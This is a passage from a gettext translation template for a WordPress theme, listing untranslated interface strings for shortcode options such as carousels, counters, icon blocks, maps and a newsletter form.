framework-customizations/extensions/shortcodes/shortcodes/map/vc_options.php:96 msgid "Select color for title." msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/contact/vc_options.php:105 msgid "Select color for title when mouse hover." msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/contact/vc_options.php:113 msgid "Select color for icon." msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/contact/vc_options.php:121 msgid "Select color for icon when mouse enter." msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/contact/vc_options.php:130 msgid "Add extra class for block" msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/content-carousel/config.php:5 msgid "SLZ Content Carousel" msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/content-carousel/config.php:6 msgid "Show the content block as slider on your page." msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/content-carousel/vc_options.php:7 msgid "Contents" msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/content-carousel/vc_options.php:8 msgid "Add new content block." msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/content-carousel/vc_options.php:15 msgid "Title of content." msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/content-carousel/vc_options.php:22 msgid "Description of content." msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/content-carousel/vc_options.php:26 #: framework-customizations/extensions/shortcodes/shortcodes/icons-block/vc_options.php:84 #: framework-customizations/extensions/shortcodes/shortcodes/main-title/vc_options.php:96 #: framework-customizations/theme/options/advertisement-settings.php:36 #: framework-customizations/theme/options/page-header-settings.php:70 #: framework-customizations/theme/options/page-options.php:116 msgid "Image" msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/content-carousel/vc_options.php:29 msgid "Image of content." msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/content-carousel/vc_options.php:36 msgid "Button of content." msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/content-carousel/vc_options.php:54 msgid "Enter number of items to show. Default: 1." msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/content-carousel/vc_options.php:55 #: framework-customizations/extensions/shortcodes/shortcodes/content-carousel/vc_options.php:63 #: framework-customizations/extensions/shortcodes/shortcodes/content-carousel/vc_options.php:71 #: framework-customizations/extensions/shortcodes/shortcodes/content-carousel/vc_options.php:79 #: framework-customizations/extensions/shortcodes/shortcodes/content-carousel/vc_options.php:87 #: framework-customizations/extensions/shortcodes/shortcodes/content-carousel/vc_options.php:94 msgid "Slider Custom" msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/content-carousel/vc_options.php:92 msgid "Slider Speed" msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/content-carousel/vc_options.php:93 msgid "Enter number value. Unit is millisecond. Default: 600." msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/content-carousel/vc_options.php:120 msgid "Choose a custom description text color." msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/count-down/config.php:10 msgid "SLZ Count Down" msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/count-down/config.php:11 msgid "Add Count Down with custom option." msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/count-down/vc_options.php:23 #: framework-customizations/extensions/shortcodes/shortcodes/posts-carousel/vc_options.php:47 msgid "Choose style to be displayed." msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/count-down/vc_options.php:27 #: framework-customizations/extensions/shortcodes/shortcodes/icons-block/vc_options.php:242 #: framework-customizations/extensions/testimonials/shortcodes/testimonial/vc_options.php:61 msgid "Block Align" msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/count-down/vc_options.php:30 #: framework-customizations/extensions/shortcodes/shortcodes/icons-block/vc_options.php:245 #: framework-customizations/extensions/testimonials/shortcodes/testimonial/vc_options.php:64 msgid "It is used for aligning the inner content of blocks." msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/count-down/vc_options.php:34 msgid "Time Finish" msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/count-down/vc_options.php:36 msgid "Enter finish time." msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/count-down/vc_options.php:40 msgid "Items Background Color" msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/count-down/vc_options.php:43 msgid "Choose background color for items." msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/count-down/vc_options.php:44 #: framework-customizations/extensions/shortcodes/shortcodes/count-down/vc_options.php:52 #: framework-customizations/extensions/shortcodes/shortcodes/count-down/vc_options.php:60 #: framework-customizations/extensions/shortcodes/shortcodes/count-down/vc_options.php:68 #: framework-customizations/extensions/shortcodes/shortcodes/count-down/vc_options.php:82 msgid "Customs CSS" msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/count-down/vc_options.php:48 #: framework-customizations/extensions/shortcodes/shortcodes/counterv2/vc_options.php:85 #: framework-customizations/extensions/shortcodes/shortcodes/counterv2/vc_options.php:199 msgid "Number Color" msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/count-down/vc_options.php:51 msgid "Choose color for number." msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/count-down/vc_options.php:59 msgid "Choose color for text under number." msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/count-down/vc_options.php:64 msgid "Colon Color" msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/count-down/vc_options.php:67 msgid "Choose color for colon." msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/count-down/vc_options.php:74 #: framework-customizations/extensions/shortcodes/shortcodes/newsletter/vc_options.php:77 #: framework-customizations/extensions/shortcodes/shortcodes/video/vc_options.php:132 msgid "Enter extra class name." msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/count-down/vc_options.php:78 msgid "Animation Color" msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/count-down/vc_options.php:81 msgid "Choose color for Animation." msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/counterv2/config.php:10 msgid "SLZ Counter" msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/counterv2/config.php:11 msgid "Create counter block." msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/counterv2/vc_options.php:13 #: framework-customizations/extensions/shortcodes/shortcodes/icons-block/vc_options.php:68 msgid "Image Upload" msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/counterv2/vc_options.php:18 #: framework-customizations/extensions/testimonials/shortcodes/testimonial/vc_options.php:27 msgid "None" msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/counterv2/vc_options.php:40 msgid "Georgia 1" msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/counterv2/vc_options.php:41 msgid "Georgia 2" msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/counterv2/vc_options.php:63 #: framework-customizations/extensions/shortcodes/shortcodes/timeline/options/layout-1.php:38 #: framework-customizations/extensions/shortcodes/shortcodes/timeline/options/layout-2.php:29 msgid "Title. If it blank the will not have a title" msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/counterv2/vc_options.php:68 msgid "Number" msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/counterv2/vc_options.php:70 msgid "Title. If it blank the will not have a number" msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/counterv2/vc_options.php:76 msgid "Choose custom color for background item." msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/counterv2/vc_options.php:87 #: framework-customizations/extensions/shortcodes/shortcodes/counterv2/vc_options.php:201 msgid "Choose custom color for number." msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/counterv2/vc_options.php:96 msgid "Number Prefix" msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/counterv2/vc_options.php:98 msgid "Add prefix for number" msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/counterv2/vc_options.php:102 msgid "Number Suffix" msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/counterv2/vc_options.php:104 msgid "Add suffix for number" msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/counterv2/vc_options.php:108 msgid "Choose Type of Icon" msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/counterv2/vc_options.php:111 msgid "Choose style to display block." msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/counterv2/vc_options.php:128 msgid "Upload Image." msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/counterv2/vc_options.php:135 #: framework-customizations/extensions/shortcodes/shortcodes/counterv2/vc_options.php:146 #: framework-customizations/extensions/shortcodes/shortcodes/item-list/vc_options.php:71 msgid "Styles" msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/counterv2/vc_options.php:161 msgid "Choose number of columns to show" msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/counterv2/vc_options.php:165 msgid "Block Alignment" msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/counterv2/vc_options.php:172 msgid "Counter Items" msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/counterv2/vc_options.php:175 msgid "List of counter items" msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/counterv2/vc_options.php:179 msgid "Number Animation?" msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/counterv2/vc_options.php:185 msgid "Show Number Line?" msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/counterv2/vc_options.php:187 msgid "Show line under number" msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/counterv2/vc_options.php:194 msgid "Choose custom color for title." msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/counterv2/vc_options.php:208 msgid "Choose custom color for icon." msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/counterv2/vc_options.php:215 msgid "Choose custom background color for icon." msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/counterv2/vc_options.php:220 #: framework-customizations/extensions/shortcodes/shortcodes/main-title/vc_options.php:133 msgid "Line Color" msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/counterv2/vc_options.php:222 msgid "Choose line custom color." msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/icons-block/config.php:10 msgid "SLZ Icons Block" msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/icons-block/config.php:11 msgid "Icons Block of info" msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/icons-block/options/layout-1.php:6 msgid "Newyork" msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/icons-block/options/layout-1.php:11 #: framework-customizations/extensions/shortcodes/shortcodes/icons-block/vc_options.php:17 #: framework-customizations/extensions/teams/shortcodes/team-block/options/layout-1.php:10 #: framework-customizations/extensions/teams/shortcodes/team-block/options/layout-3.php:8 #: framework-customizations/extensions/teams/shortcodes/team-block/vc_options.php:32 #: framework-customizations/theme/options/post-settings.php:322 msgid "Normal" msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/icons-block/options/layout-1.php:12 #: framework-customizations/extensions/teams/shortcodes/team-block/options/layout-1.php:11 #: framework-customizations/extensions/teams/shortcodes/team-block/options/layout-3.php:9 msgid "Alternate" msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/icons-block/options/layout-1.php:21 #: framework-customizations/extensions/shortcodes/shortcodes/icons-block/options/layout-2.php:20 #: framework-customizations/extensions/shortcodes/shortcodes/icons-block/options/layout-4.php:15 #: framework-customizations/extensions/shortcodes/shortcodes/main-title/options/layout-1.php:18 msgid "Select style for blocks." msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/icons-block/options/layout-1.php:32 #: framework-customizations/extensions/shortcodes/shortcodes/icons-block/options/layout-2.php:31 msgid "Choose background color for icon of blocks." msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/icons-block/options/layout-1.php:38 msgid "Icon Background Color (hover)" msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/icons-block/options/layout-1.php:45 #: framework-customizations/extensions/shortcodes/shortcodes/icons-block/options/layout-2.php:44 msgid "Choose background color for icon when you mouse over it." msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/icons-block/options/layout-1.php:51 #: framework-customizations/extensions/shortcodes/shortcodes/icons-block/options/layout-2.php:50 #: framework-customizations/extensions/shortcodes/shortcodes/icons-block/vc_options.php:140 msgid "Icon Border Color" msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/icons-block/options/layout-1.php:59 #: framework-customizations/extensions/shortcodes/shortcodes/icons-block/options/layout-2.php:58 msgid "Choose border color for icon of blocks." msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/icons-block/options/layout-1.php:65 msgid "Icon Border Color (hover)" msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/icons-block/options/layout-1.php:73 #: framework-customizations/extensions/shortcodes/shortcodes/icons-block/options/layout-2.php:71 msgid "Choose border color for icon when you mouse over it." msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/icons-block/options/layout-1.php:82 msgid "It is used for Layout United States - Style Large Spacing" msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/icons-block/options/layout-1.php:87 #: framework-customizations/extensions/shortcodes/shortcodes/icons-block/vc_options.php:246 #: framework-customizations/extensions/shortcodes/shortcodes/icons-block/vc_options.php:262 #: framework-customizations/extensions/shortcodes/shortcodes/icons-block/vc_options.php:270 #: framework-customizations/extensions/shortcodes/shortcodes/icons-block/vc_options.php:277 msgid "Options" msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/icons-block/options/layout-2.php:7 #: framework-customizations/extensions/shortcodes/shortcodes/video/options/layout-2.php:7 #: framework-customizations/extensions/testimonials/shortcodes/testimonial/options/layout-2.php:6 msgid "Jaipur" msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/icons-block/options/layout-2.php:8 #: framework-customizations/extensions/testimonials/shortcodes/testimonial/options/layout-2.php:7 msgid "Noida" msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/icons-block/options/layout-2.php:9 #: framework-customizations/extensions/testimonials/shortcodes/testimonial/options/layout-2.php:8 msgid "New Delhi" msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/icons-block/options/layout-2.php:10 #: framework-customizations/extensions/testimonials/shortcodes/testimonial/options/layout-2.php:9 msgid "Bengaluru" msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/icons-block/options/layout-2.php:37 msgid "Icon Background Color Hover" msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/icons-block/options/layout-2.php:63 msgid "Icon Border Color Hover" msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/icons-block/options/layout-4.php:4 #: framework-customizations/extensions/testimonials/shortcodes/testimonial/options/layout-4.php:3 msgid "Milan" msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/icons-block/options/layout-4.php:5 #: framework-customizations/extensions/testimonials/shortcodes/testimonial/options/layout-4.php:4 msgid "Rome" msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/icons-block/vc_options.php:10 msgid "0.5 s" msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/icons-block/vc_options.php:11 msgid "1 s" msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/icons-block/vc_options.php:12 msgid "1.5 s" msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/icons-block/vc_options.php:13 msgid "2 s" msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/icons-block/vc_options.php:20 msgid "No Spacing 01" msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/icons-block/vc_options.php:21 msgid "No Spacing 02" msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/icons-block/vc_options.php:33 msgid "Underline" msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/icons-block/vc_options.php:64 #: framework-customizations/extensions/shortcodes/shortcodes/pricing-box/vc_options.php:17 msgid "Icon Type" msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/icons-block/vc_options.php:70 msgid "Choose type of icon of block." msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/icons-block/vc_options.php:90 msgid "You can use image instead of icon." msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/icons-block/vc_options.php:97 msgid "Title. If it blank the block will not have a title." msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/icons-block/vc_options.php:127 msgid "Description. If it blank the block will not have a description." msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/icons-block/vc_options.php:134 msgid "Choose background color for icon." msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/icons-block/vc_options.php:143 msgid "Choose border color for icon." msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/icons-block/vc_options.php:156 #: framework-customizations/extensions/shortcodes/shortcodes/map/vc_options.php:116 #: framework-customizations/extensions/testimonials/shortcodes/testimonial/options/layout-2.php:40 #: framework-customizations/extensions/testimonials/shortcodes/testimonial/options/layout-4.php:35 #: framework-customizations/extensions/testimonials/shortcodes/testimonial/options/layout-5.php:30 msgid "Block Background Color" msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/icons-block/vc_options.php:159 msgid "Choose background color for blocks." msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/icons-block/vc_options.php:164 msgid "Block Background Color Hover" msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/icons-block/vc_options.php:167 msgid "Choose background color for blocks when you mouse over it." msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/icons-block/vc_options.php:172 msgid "Block Background Image" msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/icons-block/vc_options.php:175 msgid "Choose background image for blocks." msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/icons-block/vc_options.php:179 msgid "Block Background Image Hover" msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/icons-block/vc_options.php:182 msgid "Choose background image for blocks when you mouse over it." msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/icons-block/vc_options.php:189 msgid "Add Block Icon" msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/icons-block/vc_options.php:212 msgid "Blocks Animation" msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/icons-block/vc_options.php:216 msgid "Add animation for blocks." msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/icons-block/vc_options.php:220 msgid "Animation Delay Time" msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/icons-block/vc_options.php:224 msgid "Choose delay time for animation." msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/icons-block/vc_options.php:233 #: framework-customizations/extensions/shortcodes/shortcodes/item-list/vc_options.php:94 msgid "Select number of single block elements per row." msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/icons-block/vc_options.php:254 msgid "Spacing Style" msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/icons-block/vc_options.php:257 msgid "Choose style for spacing bettween blocks." msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/icons-block/vc_options.php:266 msgid "Title Line?" msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/icons-block/vc_options.php:269 msgid "Show/Hide line of title." msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/icons-block/vc_options.php:274 msgid "Icon Size" msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/icons-block/vc_options.php:276 msgid "Enter icon size (unit is px)." msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/icons-block/vc_options.php:286 #: framework-customizations/extensions/shortcodes/shortcodes/map/vc_options.php:108 msgid "Block Border Color" msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/icons-block/vc_options.php:289 msgid "Choose border color for blocks." msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/icons-block/vc_options.php:299 msgid "Block Border Color Hover" msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/icons-block/vc_options.php:302 msgid "Choose border color for blocks when you mouse over it." msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/icons-block/vc_options.php:316 msgid "Choose color for icon of blocks." msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/icons-block/vc_options.php:325 msgid "Choose color for icon of blocks when you mouse over it ." msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/icons-block/vc_options.php:333 msgid "Choose color for title of blocks." msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/icons-block/vc_options.php:339 msgid "Title Line Color" msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/icons-block/vc_options.php:343 msgid "Choose color for title line of blocks." msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/icons-block/vc_options.php:355 msgid "Choose color for description of blocks." msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/item-list/config.php:10 msgid "SLZ Item List" msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/item-list/config.php:11 msgid "list of text info" msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/item-list/vc_options.php:38 msgid "Text Info" msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/item-list/vc_options.php:42 msgid "Please input text to show." msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/item-list/vc_options.php:46 msgid "Text Description" msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/item-list/vc_options.php:50 msgid "Please input text description to show." msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/item-list/vc_options.php:57 msgid "Choose a custom text color." msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/item-list/vc_options.php:78 msgid "Show Number" msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/item-list/vc_options.php:85 msgid "Choose to show number replace for icon" msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/item-list/vc_options.php:98 msgid "Add New Item" msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/item-list/vc_options.php:107 msgid "Set color for all item." msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/item-list/vc_options.php:118 msgid "Margin Top" msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/item-list/vc_options.php:121 msgid "" "Please input margin top between items. Exp: If want to margin 8px then input " "8" msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/item-list/vc_options.php:125 msgid "Margin Bottom" msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/item-list/vc_options.php:128 msgid "" "Please input margin bottom between items. Exp: If want to margin 8px then " "input 8" msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/main-title/vc_options.php:12 msgid "No Line" msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/main-title/vc_options.php:13 msgid "Has Line" msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/main-title/vc_options.php:39 msgid "Title. If it blank will not have a title." msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/main-title/vc_options.php:43 msgid "Extra Title" msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/main-title/vc_options.php:46 msgid "Extra Title . If it blank will not have a extra title." msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/main-title/vc_options.php:50 #: framework-customizations/extensions/shortcodes/shortcodes/pricing-box/vc_options.php:193 #: framework-customizations/theme/options/page-404-settings.php:63 msgid "Sub Title" msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/main-title/vc_options.php:53 msgid "Subtitle . If it blank will not have a subtitle." msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/main-title/vc_options.php:57 #: framework-customizations/extensions/shortcodes/shortcodes/video/vc_options.php:97 #: framework-customizations/extensions/widgets/widgets/button/options.php:28 msgid "Align" msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/main-title/vc_options.php:61 msgid "Block alignment." msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/main-title/vc_options.php:65 msgid "Show Line?" msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/main-title/vc_options.php:68 msgid "Show/Hide line for this shortcode." msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/main-title/vc_options.php:83 msgid "Show Icon or Image" msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/main-title/vc_options.php:86 msgid "Display None" msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/main-title/vc_options.php:90 msgid "Show Icon or Show Image." msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/main-title/vc_options.php:91 #: framework-customizations/extensions/shortcodes/shortcodes/main-title/vc_options.php:103 msgid "Icon Settings" msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/main-title/vc_options.php:98 msgid "Upload your image." msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/main-title/vc_options.php:115 msgid "CSS box" msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/main-title/vc_options.php:117 msgid "Design Options" msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/main-title/vc_options.php:136 msgid "Choose color for line." msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/main-title/vc_options.php:145 #: framework-customizations/extensions/shortcodes/shortcodes/pricing-box/vc_options.php:203 msgid "Sub Title Color" msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/main-title/vc_options.php:148 msgid "Choose color for sub title." msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/main-title/vc_options.php:153 msgid "Extra Title Color" msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/main-title/vc_options.php:156 msgid "Choose color for extra title." msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/main-title/vc_options.php:168 msgid "Choose color for icon." msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/main-title/vc_options.php:181 msgid "Add extra class to button." msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/map/config.php:15 msgid "SLZ Map" msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/map/config.php:16 msgid "Map data from google map" msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/map/vc_options.php:8 msgid "Enter title for this session." msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/map/vc_options.php:15 msgid "Contact Information" msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/map/vc_options.php:22 msgid "Address" msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/map/vc_options.php:24 msgid "Enter Address." msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/map/vc_options.php:28 msgid "Add New Information" msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/map/vc_options.php:44 msgid "Add New Place" msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/map/vc_options.php:50 msgid "Show Block Information?" msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/map/vc_options.php:52 msgid "Show/Hide block information next to map." msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/map/vc_options.php:56 msgid "Contact Form ID" msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/map/vc_options.php:59 msgid "Add shortcode id of contact form 7 plugin" msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/map/vc_options.php:63 msgid "Map Height" msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/map/vc_options.php:66 msgid "Unit is px (ex:200)" msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/map/vc_options.php:77 msgid "Map Marker Image" msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/map/vc_options.php:80 #: framework-customizations/extensions/shortcodes/shortcodes/map/vc_options.php:88 msgid "Map Setting" msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/map/vc_options.php:84 msgid "Zoom" msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/map/vc_options.php:87 msgid "" "Enter zoom number of map. Number between 0 (farthest) and 22 that sets the " "zoom level of the map." msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/map/vc_options.php:95 #: framework-customizations/extensions/shortcodes/shortcodes/map/vc_options.php:103 #: framework-customizations/extensions/shortcodes/shortcodes/map/vc_options.php:111 #: framework-customizations/extensions/shortcodes/shortcodes/map/vc_options.php:119 msgid "Custom Css" msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/map/vc_options.php:100 msgid "Information Color" msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/map/vc_options.php:104 msgid "Select color for contact information." msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/map/vc_options.php:112 msgid "Select color for horizontal separator betwen items." msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/map/vc_options.php:120 msgid "Select background color for block." msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/newsletter/config.php:11 msgid "SLZ Newsletter" msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/newsletter/config.php:12 msgid "Extend from plugin newsletter" msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/newsletter/vc_options.php:25 msgid "Please input title if want to show." msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/newsletter/vc_options.php:32 msgid "Please input descripton if want to show." msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/newsletter/vc_options.php:36 msgid "Show Input Name?" msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/newsletter/vc_options.php:39 msgid "Choose if want to show input name." msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/newsletter/vc_options.php:47 msgid "Name Input Place Holder" msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/newsletter/vc_options.php:50 #: framework-customizations/extensions/shortcodes/shortcodes/newsletter/vc_options.php:61 msgid "Enter place holder for input" msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/newsletter/vc_options.php:58 msgid "Email Input Place Holder" msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/newsletter/vc_options.php:65 msgid "Text Button Submit" msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/newsletter/vc_options.php:68 msgid "Enter text for button submit." msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/newsletter/vc_options.php:93 msgid "Choose color for description." msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/newsletter/vc_options.php:98 msgid "Input Text Color" msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/newsletter/vc_options.php:100 msgid "Choose color for input text." 